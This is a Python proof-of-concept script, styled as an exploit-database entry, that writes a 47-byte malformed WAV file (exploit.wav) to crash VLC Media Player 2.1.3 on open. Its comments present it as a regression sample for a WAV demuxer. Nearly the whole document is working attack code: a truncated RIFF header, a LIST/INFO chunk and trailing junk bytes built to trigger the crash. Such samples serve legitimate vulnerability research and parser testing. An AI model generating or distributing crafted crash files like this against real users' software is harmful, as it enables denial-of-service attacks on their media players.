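#!C:\Python27\python.exe
# Exploit Title: VLC Media Player - .WAV DoS
# Date: 2014-05-11
# Exploit Author: John Cobb - www.NoBytes.com
# Vendor Homepage: www.videolan.org
# Software Link: http://get.videolan.org/vlc/2.1.3/win32/vlc-2.1.3-win32.exe
# Version: 2.1.3 Rincewind
# Tested on: Win7 SP1 64bit
# CVE: None
#
# !exploitable
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection
#   starting at msvcrt!strcspn+0x000000000000002d (Hash=0x0c543936.0x0c29261d)
# The data from the faulting address is later used to determine whether or
# not a branch is taken.
#
# Builds the truncated WAV image that crashed VLC 2.1.3 on open and, when run
# as a script, writes it to exploit.wav.  The image serves as a regression
# sample for a WAV/RIFF demuxer: the RIFF header declares a body far larger
# than what follows, and the only chunk present is a LIST/INFO chunk carrying
# a NUL-terminated string, followed by a few stray bytes.
#
# All pieces are bytes literals and the file is written in binary mode; the
# original used str literals and text mode ('w'), which on Windows applies
# newline translation and on Python 3 would UTF-8-encode the 0xD2 byte into
# two bytes, so the written file would not match the image below.

# RIFF header: "RIFF", declared body size 0x04D2 (1234 bytes, far more than
# is actually written), form type "WAVE".
WAVRIFFHEADER = b"\x52\x49\x46\x46\xD2\x04\x00\x00\x57\x41\x56\x45"

# LIST chunk: "LIST", chunk size 0x14 (20 bytes), list type "INFO", then the
# NUL-terminated string "www.NoBytes.com" (16 bytes, so the size is consistent).
ListChunk = (
    b"\x4C\x49\x53\x54\x14\x00\x00\x00\x49\x4E\x46\x4F"
    b"\x77\x77\x77\x2E\x4E\x6F\x42\x79\x74\x65\x73\x2E\x63\x6F\x6D\x00"
)

# Crash trigger: seven 'A' bytes where the demuxer would expect another chunk.
Junk = b"\x41" * 7

# Complete file image (47 bytes).
payload = WAVRIFFHEADER + ListChunk + Junk


def build_payload():
    """Return the malformed WAV image as bytes.

    Returns:
        bytes: RIFF header + LIST/INFO chunk + 7 trailing 'A' bytes,
        47 bytes in total.
    """
    return WAVRIFFHEADER + ListChunk + Junk


def write_sample(path="exploit.wav"):
    """Write the malformed WAV image to *path* in binary mode.

    Args:
        path: Destination file name; defaults to "exploit.wav" in the
            current directory, as the original script did.

    Returns:
        int: Number of bytes written.

    Raises:
        IOError / OSError: if the file cannot be opened for writing.
    """
    data = build_payload()
    # Binary mode and a context manager: no newline translation, no
    # encoding, and the handle is closed even if the write fails.
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    write_sample()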